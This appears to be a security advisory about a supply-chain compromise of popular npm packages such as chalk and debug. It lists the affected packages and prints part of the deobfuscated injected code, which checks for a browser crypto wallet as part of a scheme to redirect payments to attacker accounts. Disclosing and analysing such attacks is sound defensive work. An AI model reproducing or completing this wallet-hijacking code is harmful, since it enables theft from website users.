NPM debug and chalk packages compromised

Summary

Starting at September 8th, 13:16 UTC, our Aikido intel feed alerted us to a series packages being pushed to npm, which appeared to contains malicious code. These were 18 very popular packages,backslash (0.26m downloads per week)chalk-template (3.9m downloads per week)supports-hyperlinks (19.2m downloads per week)has-ansi (12.1m downloads per week)simple-swizzle (26.26m downloads per week)color-string (27.48m downloads per week)error-ex (47.17m downloads per week)color-name (191.71m downloads per week)is-arrayish (73.8m downloads per week)slice-ansi (59.8m downloads per week)color-convert (193.5m downloads per week)wrap-ansi (197.99m downloads per week)ansi-regex (243.64m downloads per week)supports-color (287.1m downloads per week)strip-ansi (261.17m downloads per week)chalk (299.99m downloads per week)debug (357.6m downloads per week)ansi-styles (371.41m downloads per week)The packages were updated to contain a piece of code that would be executed on the client of a website, which silently intercepts crypto and web3 activity in the browser, manipulates wallet interactions, and rewrites payment destinations so that funds and approvals are redirected to attacker-controlled accounts without any obvious signs to the user.What happened?The above packages all started having new versions released, an example here being is-arrayish:We can see that the index.js file is modified, and contains obfuscated code:‍After applying a bit of deobfuscation to it, we get a fairly complex piece of code still:var neth = 0; var rund = 0; var loval = 0; async function checkethereumw() { try { const _0x124ed3 = await window.ethereum.request({ 'method': "eth_accounts" }); if (_0x124ed3.length > 0) { runmask(); if (rund != 1) { rund = 1; neth = 1; newdlocal(); } } else if (rund != 1) { rund = 1; newdlocal(); } } catch (_0x53a897) { if (rund != 1) { rund = 1; newdlocal(); } } } if (typeof window != "undefined" && typeof window.ethereum != "undefined") { checkethereumw(); } else if (rund != 1) ...